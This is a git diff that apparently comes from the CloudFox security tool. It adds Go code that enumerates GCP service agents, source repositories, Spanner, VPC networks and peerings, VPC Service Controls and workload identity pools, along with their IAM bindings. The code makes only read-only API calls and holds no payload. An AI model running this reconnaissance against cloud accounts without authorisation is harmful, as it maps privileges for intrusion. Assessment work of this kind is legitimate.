"@gcp-sa-cloudbuild.iam.gserviceaccount.com": { + Service: "Cloud Build", + Description: "Cloud Build Service Agent - manages Cloud Build resources", + }, + "@cloudcomposer-accounts.iam.gserviceaccount.com": { + Service: "Composer", + Description: "Cloud Composer Service Agent - manages Airflow environments", + }, + "@dataflow-service-producer-prod.iam.gserviceaccount.com": { + Service: "Dataflow", + Description: "Dataflow Service Agent - manages Dataflow jobs", + }, + "@gcp-sa-dataproc.iam.gserviceaccount.com": { + Service: "Dataproc", + Description: "Dataproc Service Agent - manages Dataproc clusters", + }, + "@gcp-sa-pubsub.iam.gserviceaccount.com": { + Service: "Pub/Sub", + Description: "Pub/Sub Service Agent - manages Pub/Sub resources", + }, + "@serverless-robot-prod.iam.gserviceaccount.com": { + Service: "Cloud Run/Functions", + Description: "Serverless Service Agent - manages serverless resources", + }, + "@gcp-sa-cloudscheduler.iam.gserviceaccount.com": { + Service: "Cloud Scheduler", + Description: "Cloud Scheduler Service Agent", + }, + "@gcp-sa-bigquery.iam.gserviceaccount.com": { + Service: "BigQuery", + Description: "BigQuery Service Agent - manages BigQuery resources", + }, + "@gcp-sa-artifactregistry.iam.gserviceaccount.com": { + Service: "Artifact Registry", + Description: "Artifact Registry Service Agent", + }, + "@gcp-sa-secretmanager.iam.gserviceaccount.com": { + Service: "Secret Manager", + Description: "Secret Manager Service Agent", + }, + "@gcp-sa-firestore.iam.gserviceaccount.com": { + Service: "Firestore", + Description: "Firestore Service Agent", + }, + "@gcp-sa-cloud-sql.iam.gserviceaccount.com": { + Service: "Cloud SQL", + Description: "Cloud SQL Service Agent", + }, + "@gcp-sa-logging.iam.gserviceaccount.com": { + Service: "Cloud Logging", + Description: "Cloud Logging Service Agent", + }, + "@gcp-sa-monitoring.iam.gserviceaccount.com": { + Service: "Cloud Monitoring", + Description: "Cloud Monitoring Service Agent", + }, +} + +// GetServiceAgents retrieves all service agents with IAM bindings +func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgentInfo, error) { + ctx := context.Background() + service, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var agents []ServiceAgentInfo + + // Get IAM policy + policy, err := service.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + // Track which service agents we've seen + seenAgents := make(map[string]*ServiceAgentInfo) + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if !strings.HasPrefix(member, "serviceAccount:") { + continue + } + + email := strings.TrimPrefix(member, "serviceAccount:") + + // Check if it's a service agent + agentType, description := s.identifyServiceAgent(email) + if agentType == "" { + continue // Not a service agent + } + + // Check for cross-project access + isCrossProject := !strings.Contains(email, projectID) + + // Add or update agent + if agent, exists := seenAgents[email]; exists { + agent.Roles = append(agent.Roles, binding.Role) + } else { + agent := &ServiceAgentInfo{ + Email: email, + ProjectID: projectID, + ServiceName: agentType, + AgentType: agentType, + Roles: []string{binding.Role}, + IsCrossProject: isCrossProject, + Description: description, + } + seenAgents[email] = agent + } + } + } + + // Convert to slice + for _, agent := range seenAgents { + agents = append(agents, *agent) + } + + return agents, nil +} + +func (s *ServiceAgentsService) identifyServiceAgent(email string) (string, string) { + // Check known patterns + for suffix, info := range KnownServiceAgents { + if strings.HasSuffix(email, suffix) { + return info.Service, info.Description + } + } + + // Check for generic service agent patterns + if strings.Contains(email, "@gcp-sa-") { + // Extract service name from gcp-sa-{service} + parts := strings.Split(email, "@") + if len(parts) == 2 { + saPart := parts[1] + if strings.HasPrefix(saPart, "gcp-sa-") { + serviceName := strings.TrimPrefix(saPart, "gcp-sa-") + serviceName = strings.Split(serviceName, ".")[0] + return serviceName, fmt.Sprintf("%s Service Agent", serviceName) + } + } + } + + // Check for project-specific service agents + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + return "Compute Engine", "Default Compute Engine service account" + } + + if strings.Contains(email, "@appspot.gserviceaccount.com") { + return "App Engine", "App Engine default service account" + } + + return "", "" +} + +// GetDefaultServiceAccounts returns the default service accounts for a project +func (s *ServiceAgentsService) GetDefaultServiceAccounts(projectID string, projectNumber string) []ServiceAgentInfo { + var defaults []ServiceAgentInfo + + // Google APIs Service Agent + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s@cloudservices.gserviceaccount.com", projectNumber), + ProjectID: projectID, + ServiceName: "Google APIs", + AgentType: "Google APIs", + Description: "Google APIs Service Agent - automatically created, manages resources on behalf of Google Cloud services", + }) + + // Compute Engine default SA + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s-compute@developer.gserviceaccount.com", projectNumber), + ProjectID: projectID, + ServiceName: "Compute Engine", + AgentType: "Compute Engine", + Description: "Default Compute Engine service account - used by instances without explicit SA", + }) + + // App Engine default SA + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s@appspot.gserviceaccount.com", projectID), + ProjectID: projectID, + ServiceName: "App Engine", + AgentType: "App Engine", + Description: "App Engine default service account", + }) + + return defaults +} diff --git a/gcp/services/sourceReposService/sourceReposService.go b/gcp/services/sourceReposService/sourceReposService.go new file mode 100644 index 00000000..7d2b7f31 --- /dev/null +++ b/gcp/services/sourceReposService/sourceReposService.go @@ -0,0 +1,115 @@ +package sourcereposservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + sourcerepo "google.golang.org/api/sourcerepo/v1" +) + +type SourceReposService struct{} + +func New() *SourceReposService { + return &SourceReposService{} +} + +// RepoInfo represents a Cloud Source Repository +type RepoInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + URL string `json:"url"` + Size int64 `json:"size"` + MirrorConfig bool `json:"mirrorConfig"` + MirrorURL string `json:"mirrorUrl"` + PubsubConfigs int `json:"pubsubConfigs"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM binding (one role + one member) +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ListRepos retrieves all Cloud Source Repositories in a project +func (s *SourceReposService) ListRepos(projectID string) ([]RepoInfo, error) { + ctx := context.Background() + service, err := sourcerepo.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sourcerepo.googleapis.com") + } + + var repos []RepoInfo + + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := service.Projects.Repos.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sourcerepo.googleapis.com") + } + + for _, repo := range resp.Repos { + info := s.parseRepo(repo, projectID) + + // Get IAM policy for this repo + iamBindings := s.getRepoIAMBindings(service, repo.Name) + info.IAMBindings = iamBindings + + repos = append(repos, info) + } + + return repos, nil +} + +// getRepoIAMBindings retrieves IAM bindings for a repository +func (s *SourceReposService) getRepoIAMBindings(service *sourcerepo.Service, repoName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Repos.GetIamPolicy(repoName).OptionsRequestedPolicyVersion(3).Do() + if err != nil { + // Silently skip if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func (s *SourceReposService) parseRepo(repo *sourcerepo.Repo, projectID string) RepoInfo { + // Extract repo name from full path + name := repo.Name + if strings.Contains(name, "/") { + parts := strings.Split(name, "/") + name = parts[len(parts)-1] + } + + info := RepoInfo{ + Name: name, + ProjectID: projectID, + URL: repo.Url, + Size: repo.Size, + } + + // Check for mirror configuration + if repo.MirrorConfig != nil { + info.MirrorConfig = true + info.MirrorURL = repo.MirrorConfig.Url + } + + // Count pubsub configs + if repo.PubsubConfigs != nil { + info.PubsubConfigs = len(repo.PubsubConfigs) + } + + return info +} + diff --git a/gcp/services/spannerService/spannerService.go b/gcp/services/spannerService/spannerService.go new file mode 100644 index 00000000..db8e12b0 --- /dev/null +++ b/gcp/services/spannerService/spannerService.go @@ -0,0 +1,181 @@ +package spannerservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + spanner "google.golang.org/api/spanner/v1" +) + +type SpannerService struct { + session *gcpinternal.SafeSession +} + +func New() *SpannerService { + return &SpannerService{} +} + +// IAMBinding represents a single IAM binding (one role + one member) +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +type SpannerInstanceInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Config string `json:"config"` + NodeCount int64 `json:"nodeCount"` + State string `json:"state"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +type SpannerDatabaseInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + InstanceName string `json:"instanceName"` + State string `json:"state"` + EncryptionType string `json:"encryptionType"` + KmsKeyName string `json:"kmsKeyName"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +type SpannerResult struct { + Instances []SpannerInstanceInfo + Databases []SpannerDatabaseInfo +} + +// ListInstancesAndDatabases retrieves all Spanner instances and databases with IAM bindings +func (s *SpannerService) ListInstancesAndDatabases(projectID string) (*SpannerResult, error) { + ctx := context.Background() + service, err := spanner.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + result := &SpannerResult{ + Instances: []SpannerInstanceInfo{}, + Databases: []SpannerDatabaseInfo{}, + } + + parent := fmt.Sprintf("projects/%s", projectID) + + req := service.Projects.Instances.List(parent) + err = req.Pages(ctx, func(page *spanner.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := SpannerInstanceInfo{ + Name: extractName(instance.Name), + FullName: instance.Name, + ProjectID: projectID, + DisplayName: instance.DisplayName, + Config: extractName(instance.Config), + NodeCount: instance.NodeCount, + State: instance.State, + } + + // Get IAM bindings for this instance + info.IAMBindings = s.getInstanceIAMBindings(service, ctx, instance.Name) + + result.Instances = append(result.Instances, info) + + // Get databases for this instance + databases := s.listDatabases(service, ctx, instance.Name, projectID) + result.Databases = append(result.Databases, databases...) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + return result, nil +} + +// getInstanceIAMBindings retrieves IAM bindings for an instance +func (s *SpannerService) getInstanceIAMBindings(service *spanner.Service, ctx context.Context, instanceName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Instances.GetIamPolicy(instanceName, &spanner.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +// listDatabases retrieves all databases for an instance with their IAM bindings +func (s *SpannerService) listDatabases(service *spanner.Service, ctx context.Context, instanceName string, projectID string) []SpannerDatabaseInfo { + var databases []SpannerDatabaseInfo + + req := service.Projects.Instances.Databases.List(instanceName) + _ = req.Pages(ctx, func(page *spanner.ListDatabasesResponse) error { + for _, db := range page.Databases { + dbInfo := SpannerDatabaseInfo{ + Name: extractName(db.Name), + FullName: db.Name, + ProjectID: projectID, + InstanceName: extractName(instanceName), + State: db.State, + } + + // Determine encryption type + if db.EncryptionConfig != nil && db.EncryptionConfig.KmsKeyName != "" { + dbInfo.EncryptionType = "CMEK" + dbInfo.KmsKeyName = db.EncryptionConfig.KmsKeyName + } else { + dbInfo.EncryptionType = "Google-managed" + } + + // Get IAM bindings for this database + dbInfo.IAMBindings = s.getDatabaseIAMBindings(service, ctx, db.Name) + + databases = append(databases, dbInfo) + } + return nil + }) + + return databases +} + +// getDatabaseIAMBindings retrieves IAM bindings for a database +func (s *SpannerService) getDatabaseIAMBindings(service *spanner.Service, ctx context.Context, databaseName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Instances.Databases.GetIamPolicy(databaseName, &spanner.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/vpcService/vpcService.go b/gcp/services/vpcService/vpcService.go new file mode 100644 index 00000000..2da8705a --- /dev/null +++ b/gcp/services/vpcService/vpcService.go @@ -0,0 +1,324 @@ +package vpcservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + compute "google.golang.org/api/compute/v1" +) + +type VPCService struct { + session *gcpinternal.SafeSession +} + +func New() *VPCService { + return &VPCService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *VPCService { + return &VPCService{session: session} +} + +// VPCNetworkInfo represents a VPC network +type VPCNetworkInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + AutoCreateSubnetworks bool `json:"autoCreateSubnetworks"` + RoutingMode string `json:"routingMode"` // REGIONAL or GLOBAL + MTU int64 `json:"mtu"` + Subnetworks []string `json:"subnetworks"` + Peerings []string `json:"peerings"` + FirewallPolicyCount int `json:"firewallPolicyCount"` +} + +// SubnetInfo represents a subnetwork +type SubnetInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + Region string `json:"region"` + IPCidrRange string `json:"ipCidrRange"` + GatewayAddress string `json:"gatewayAddress"` + PrivateIPGoogleAccess bool `json:"privateIpGoogleAccess"` + Purpose string `json:"purpose"` + EnableFlowLogs bool `json:"enableFlowLogs"` + SecondaryIPRanges []string `json:"secondaryIpRanges"` +} + +// VPCPeeringInfo represents a VPC peering connection +type VPCPeeringInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + PeerNetwork string `json:"peerNetwork"` + PeerProjectID string `json:"peerProjectId"` + State string `json:"state"` + ExportCustomRoutes bool `json:"exportCustomRoutes"` + ImportCustomRoutes bool `json:"importCustomRoutes"` + ExchangeSubnetRoutes bool `json:"exchangeSubnetRoutes"` +} + +// RouteInfo represents a route +type RouteInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + DestRange string `json:"destRange"` + NextHopType string `json:"nextHopType"` + NextHop string `json:"nextHop"` + Priority int64 `json:"priority"` + Tags []string `json:"tags"` +} + +// ListVPCNetworks retrieves all VPC networks +func (s *VPCService) ListVPCNetworks(projectID string) ([]VPCNetworkInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var networks []VPCNetworkInfo + + resp, err := service.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, network := range resp.Items { + info := s.parseNetwork(network, projectID) + networks = append(networks, info) + } + + return networks, nil +} + +// ListSubnets retrieves all subnets +func (s *VPCService) ListSubnets(projectID string) ([]SubnetInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var subnets []SubnetInfo + + req := service.Subnetworks.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for _, scopedList := range page.Items { + for _, subnet := range scopedList.Subnetworks { + info := s.parseSubnet(subnet, projectID) + subnets = append(subnets, info) + } + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + return subnets, nil +} + +// ListVPCPeerings retrieves all VPC peering connections +func (s *VPCService) ListVPCPeerings(projectID string) ([]VPCPeeringInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var peerings []VPCPeeringInfo + + networks, err := service.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, network := range networks.Items { + for _, peering := range network.Peerings { + // Extract peer project ID from the full network path + peerProjectID := extractProjectFromNetwork(peering.Network) + + info := VPCPeeringInfo{ + Name: peering.Name, + ProjectID: projectID, + Network: network.Name, + PeerNetwork: extractName(peering.Network), + PeerProjectID: peerProjectID, + State: peering.State, + ExportCustomRoutes: peering.ExportCustomRoutes, + ImportCustomRoutes: peering.ImportCustomRoutes, + ExchangeSubnetRoutes: peering.ExchangeSubnetRoutes, + } + peerings = append(peerings, info) + } + } + + return peerings, nil +} + +// ListRoutes retrieves all routes +func (s *VPCService) ListRoutes(projectID string) ([]RouteInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var routes []RouteInfo + + resp, err := service.Routes.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, route := range resp.Items { + info := s.parseRoute(route, projectID) + routes = append(routes, info) + } + + return routes, nil +} + +func (s *VPCService) parseNetwork(network *compute.Network, projectID string) VPCNetworkInfo { + info := VPCNetworkInfo{ + Name: network.Name, + ProjectID: projectID, + Description: network.Description, + AutoCreateSubnetworks: network.AutoCreateSubnetworks, + RoutingMode: network.RoutingConfig.RoutingMode, + MTU: network.Mtu, + } + + for _, subnet := range network.Subnetworks { + info.Subnetworks = append(info.Subnetworks, extractName(subnet)) + } + + for _, peering := range network.Peerings { + info.Peerings = append(info.Peerings, peering.Name) + } + + return info +} + +func (s *VPCService) parseSubnet(subnet *compute.Subnetwork, projectID string) SubnetInfo { + info := SubnetInfo{ + Name: subnet.Name, + ProjectID: projectID, + Network: extractName(subnet.Network), + Region: extractRegion(subnet.Region), + IPCidrRange: subnet.IpCidrRange, + GatewayAddress: subnet.GatewayAddress, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + } + + if subnet.LogConfig != nil { + info.EnableFlowLogs = subnet.LogConfig.Enable + } + + for _, secondary := range subnet.SecondaryIpRanges { + info.SecondaryIPRanges = append(info.SecondaryIPRanges, fmt.Sprintf("%s:%s", secondary.RangeName, secondary.IpCidrRange)) + } + + return info +} + +func (s *VPCService) parseRoute(route *compute.Route, projectID string) RouteInfo { + info := RouteInfo{ + Name: route.Name, + ProjectID: projectID, + Network: extractName(route.Network), + DestRange: route.DestRange, + Priority: route.Priority, + Tags: route.Tags, + } + + // Determine next hop type + if route.NextHopGateway != "" { + info.NextHopType = "gateway" + info.NextHop = extractName(route.NextHopGateway) + } else if route.NextHopInstance != "" { + info.NextHopType = "instance" + info.NextHop = extractName(route.NextHopInstance) + } else if route.NextHopIp != "" { + info.NextHopType = "ip" + info.NextHop = route.NextHopIp + } else if route.NextHopNetwork != "" { + info.NextHopType = "network" + info.NextHop = extractName(route.NextHopNetwork) + } else if route.NextHopPeering != "" { + info.NextHopType = "peering" + info.NextHop = route.NextHopPeering + } else if route.NextHopIlb != "" { + info.NextHopType = "ilb" + info.NextHop = extractName(route.NextHopIlb) + } else if route.NextHopVpnTunnel != "" { + info.NextHopType = "vpn_tunnel" + info.NextHop = extractName(route.NextHopVpnTunnel) + } + + return info +} + +func extractProjectFromNetwork(networkPath string) string { + // Format: https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network} + // or: projects/{project}/global/networks/{network} + parts := strings.Split(networkPath, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +func extractRegion(fullPath string) string { + parts := strings.Split(fullPath, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + return fullPath +} diff --git a/gcp/services/vpcscService/vpcscService.go b/gcp/services/vpcscService/vpcscService.go new file mode 100644 index 00000000..9d040989 --- /dev/null +++ b/gcp/services/vpcscService/vpcscService.go @@ -0,0 +1,251 @@ +package vpcscservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" +) + +type VPCSCService struct { + session *gcpinternal.SafeSession +} + +func New() *VPCSCService { + return &VPCSCService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *VPCSCService { + return &VPCSCService{session: session} +} + +// AccessPolicyInfo represents an access policy +type AccessPolicyInfo struct { + Name string `json:"name"` + Title string `json:"title"` + Parent string `json:"parent"` + Etag string `json:"etag"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` +} + +// ServicePerimeterInfo represents a VPC Service Control perimeter +type ServicePerimeterInfo struct { + Name string `json:"name"` + Title string `json:"title"` + PolicyName string `json:"policyName"` + PerimeterType string `json:"perimeterType"` // PERIMETER_TYPE_REGULAR or PERIMETER_TYPE_BRIDGE + Description string `json:"description"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Status configuration + Resources []string `json:"resources"` // Projects in the perimeter + RestrictedServices []string `json:"restrictedServices"` // Services protected + AccessLevels []string `json:"accessLevels"` // Access levels allowed + VPCAccessibleServices []string `json:"vpcAccessibleServices"` + + // Ingress/Egress policies + IngressPolicyCount int `json:"ingressPolicyCount"` + EgressPolicyCount int `json:"egressPolicyCount"` + HasIngressRules bool `json:"hasIngressRules"` + HasEgressRules bool `json:"hasEgressRules"` +} + +// AccessLevelInfo represents an access level +type AccessLevelInfo struct { + Name string `json:"name"` + Title string `json:"title"` + PolicyName string `json:"policyName"` + Description string `json:"description"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Conditions + IPSubnetworks []string `json:"ipSubnetworks"` + Regions []string `json:"regions"` + Members []string `json:"members"` +} + +// ListAccessPolicies retrieves all access policies for an organization +func (s *VPCSCService) ListAccessPolicies(orgID string) ([]AccessPolicyInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var policies []AccessPolicyInfo + + // List access policies for the organization + parent := fmt.Sprintf("organizations/%s", orgID) + req := service.AccessPolicies.List().Parent(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessPoliciesResponse) error { + for _, policy := range page.AccessPolicies { + info := AccessPolicyInfo{ + Name: extractPolicyName(policy.Name), + Title: policy.Title, + Parent: policy.Parent, + Etag: policy.Etag, + } + policies = append(policies, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return policies, nil +} + +// ListServicePerimeters retrieves all service perimeters for an access policy +func (s *VPCSCService) ListServicePerimeters(policyName string) ([]ServicePerimeterInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var perimeters []ServicePerimeterInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.ServicePerimeters.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListServicePerimetersResponse) error { + for _, perimeter := range page.ServicePerimeters { + info := s.parsePerimeter(perimeter, policyName) + perimeters = append(perimeters, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return perimeters, nil +} + +// ListAccessLevels retrieves all access levels for an access policy +func (s *VPCSCService) ListAccessLevels(policyName string) ([]AccessLevelInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var levels []AccessLevelInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.AccessLevels.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range page.AccessLevels { + info := s.parseAccessLevel(level, policyName) + levels = append(levels, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return levels, nil +} + +func (s *VPCSCService) parsePerimeter(perimeter *accesscontextmanager.ServicePerimeter, policyName string) ServicePerimeterInfo { + info := ServicePerimeterInfo{ + Name: extractPerimeterName(perimeter.Name), + Title: perimeter.Title, + PolicyName: policyName, + PerimeterType: perimeter.PerimeterType, + Description: perimeter.Description, + } + + // Parse status configuration + if perimeter.Status != nil { + info.Resources = perimeter.Status.Resources + info.RestrictedServices = perimeter.Status.RestrictedServices + info.AccessLevels = perimeter.Status.AccessLevels + + if perimeter.Status.VpcAccessibleServices != nil { + info.VPCAccessibleServices = perimeter.Status.VpcAccessibleServices.AllowedServices + } + + if len(perimeter.Status.IngressPolicies) > 0 { + info.IngressPolicyCount = len(perimeter.Status.IngressPolicies) + info.HasIngressRules = true + } + + if len(perimeter.Status.EgressPolicies) > 0 { + info.EgressPolicyCount = len(perimeter.Status.EgressPolicies) + info.HasEgressRules = true + } + } + + return info +} + +func (s *VPCSCService) parseAccessLevel(level *accesscontextmanager.AccessLevel, policyName string) AccessLevelInfo { + info := AccessLevelInfo{ + Name: extractLevelName(level.Name), + Title: level.Title, + PolicyName: policyName, + Description: level.Description, + } + + if level.Basic != nil && len(level.Basic.Conditions) > 0 { + for _, condition := range level.Basic.Conditions { + info.IPSubnetworks = append(info.IPSubnetworks, condition.IpSubnetworks...) + info.Regions = append(info.Regions, condition.Regions...) + info.Members = append(info.Members, condition.Members...) + } + } + + return info +} + +func extractPolicyName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractPerimeterName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLevelName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/workloadIdentityService/workloadIdentityService.go b/gcp/services/workloadIdentityService/workloadIdentityService.go new file mode 100644 index 00000000..161c020f --- /dev/null +++ b/gcp/services/workloadIdentityService/workloadIdentityService.go @@ -0,0 +1,227 @@ +package workloadidentityservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + iam "google.golang.org/api/iam/v1" +) + +type WorkloadIdentityService struct{} + +func New() *WorkloadIdentityService { + return &WorkloadIdentityService{} +} + +// WorkloadIdentityPool represents a Workload Identity Pool +type WorkloadIdentityPool struct { + Name string `json:"name"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + ProjectID string `json:"projectId"` + State string `json:"state"` + Disabled bool `json:"disabled"` + PoolID string `json:"poolId"` +} + +// WorkloadIdentityProvider represents a Workload Identity Pool Provider +type WorkloadIdentityProvider struct { + Name string `json:"name"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + ProjectID string `json:"projectId"` + ProviderType string `json:"providerType"` // aws, oidc, saml + Disabled bool `json:"disabled"` + AttributeMapping map[string]string `json:"attributeMapping"` + AttributeCondition string `json:"attributeCondition"` // CEL expression + // AWS specific + AWSAccountID string `json:"awsAccountId"` + // OIDC specific + OIDCIssuerURI string `json:"oidcIssuerUri"` + AllowedAudiences []string `json:"allowedAudiences"` +} + +// FederatedIdentityBinding represents a binding from federated identity to GCP SA +type FederatedIdentityBinding struct { + ProjectID string `json:"projectId"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + GCPServiceAccount string `json:"gcpServiceAccount"` + ExternalSubject string `json:"externalSubject"` + AttributeCondition string `json:"attributeCondition"` +} + +// ListWorkloadIdentityPools lists all Workload Identity Pools in a project +func (s *WorkloadIdentityService) ListWorkloadIdentityPools(projectID string) ([]WorkloadIdentityPool, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var pools []WorkloadIdentityPool + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := iamService.Projects.Locations.WorkloadIdentityPools.List(parent) + err = req.Pages(ctx, func(page *iam.ListWorkloadIdentityPoolsResponse) error { + for _, pool := range page.WorkloadIdentityPools { + // Extract pool ID from name + // Format: projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID + poolID := extractLastPart(pool.Name) + + pools = append(pools, WorkloadIdentityPool{ + Name: pool.Name, + DisplayName: pool.DisplayName, + Description: pool.Description, + ProjectID: projectID, + State: 